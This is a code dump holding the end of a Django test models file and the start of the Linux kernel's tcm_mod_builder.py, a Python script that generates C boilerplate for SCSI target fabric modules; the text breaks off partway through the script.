content_type = models.ForeignKey(ContentType, models.CASCADE)
gfk = GenericForeignKey()
gr = GenericRelation(DataModel)
class ManyToMany(models.Model):
m2m = models.ManyToManyField('self')
###############################################################################
class UUIDModel(models.Model):
field = models.UUIDField()
class NullableUUIDModel(models.Model):
field = models.UUIDField(blank=True, null=True)
class PrimaryKeyUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
class RelatedToUUIDModel(models.Model):
uuid_fk = models.ForeignKey('PrimaryKeyUUIDModel', models.CASCADE)
class UUIDChild(PrimaryKeyUUIDModel):
pass
class UUIDGrandchild(UUIDChild):
pass
| bsd-3-clause |
TeamOrion-Devices/kernel_htc_msm8974 | Documentation/target/tcm_mod_builder.py | 4981 | 41422 | #!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: [email protected]
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
if os.path.isdir(fabric_mod_dir_var) == True:
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!se_nacl_new)\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!tpg) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!" + fabric_mod_port + ") {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (IS_ERR(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return PTR_ERR(fabric);\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!" + fabric_mod_name + "_fabric_configfs)\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
